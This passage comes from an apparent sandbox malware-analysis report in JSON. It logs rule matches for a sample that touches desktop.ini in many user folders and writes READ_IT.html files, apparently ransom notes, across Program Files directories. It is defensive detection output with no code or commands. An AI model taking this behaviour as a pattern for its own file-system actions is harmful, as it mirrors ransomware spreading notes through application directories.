"ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\public\\recorded tv\\sample media\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Public\\Pictures\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5591", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\public\\pictures\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5607", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\public\\pictures\\sample pictures\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Public\\Music\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\music\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5635", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\public\\music\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Public\\Music\\Sample Music\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\music\\sample music\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5641", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\public\\music\\sample music\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Public\\Libraries\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\libraries\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5659", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\public\\libraries\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Public\\Downloads\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\downloads\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5669", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\public\\downloads\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Public\\Documents\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\documents\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5675", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\public\\documents\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Public\\Desktop\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\desktop\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5682", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\public\\desktop\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Default\\Videos\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\videos\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5693", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\default\\videos\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Default\\Searches\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\searches\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5694", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\default\\searches\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Default\\Saved Games\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\saved games\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5697", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\default\\saved games\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Default\\Pictures\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\pictures\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5698", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\default\\pictures\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Default\\Music\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\music\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5699", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\default\\music\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Default\\Links\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\links\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5700", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\default\\links\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Default\\Favorites\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5704", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\default\\favorites\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Default\\Favorites\\Links\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\favorites\\links\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5720", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\default\\favorites\\links\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Default\\Downloads\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\downloads\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5722", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\default\\downloads\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Default\\Documents\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\documents\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5723", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\default\\documents\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Default\\Desktop\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\desktop\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5724", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\default\\desktop\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\Default\\Contacts\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\default\\contacts\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5726", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\users\\default\\contacts\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\desktop.ini", "hashes": [], "norm_filename": "c:\\program files (x86)\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_5891", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\program files (x86)\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_5896", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Mozilla Maintenance Service\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\mozilla maintenance service\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_5906", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\mozilla maintenance service\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_5916", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_5982", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_6116", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_6126", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_6161", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_6191", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_6309", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_6363", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_6417", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_6567", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_6613", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files 